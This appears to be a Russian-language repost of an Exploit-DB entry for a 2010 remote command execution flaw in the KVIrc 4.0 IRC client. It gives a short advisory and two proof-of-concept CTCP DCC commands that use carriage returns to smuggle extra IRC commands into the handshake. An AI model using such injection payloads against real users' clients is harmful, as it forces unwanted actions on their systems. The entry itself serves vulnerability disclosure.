- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34385
- Проверка EDB
-
- Пройдено
- Автор
- UNIC0RN
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2010-2785
- Дата публикации
- 2010-07-28
KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution
Код:
source: https://www.securityfocus.com/bid/42026/info
KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to execute arbitrary commands within the context of the affected application.
KVIrc 4.0.0 is vulnerable; other versions may also be affected.
/ctcp nickname DCC GET\rQUIT\r
/ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r- Источник
- www.exploit-db.com
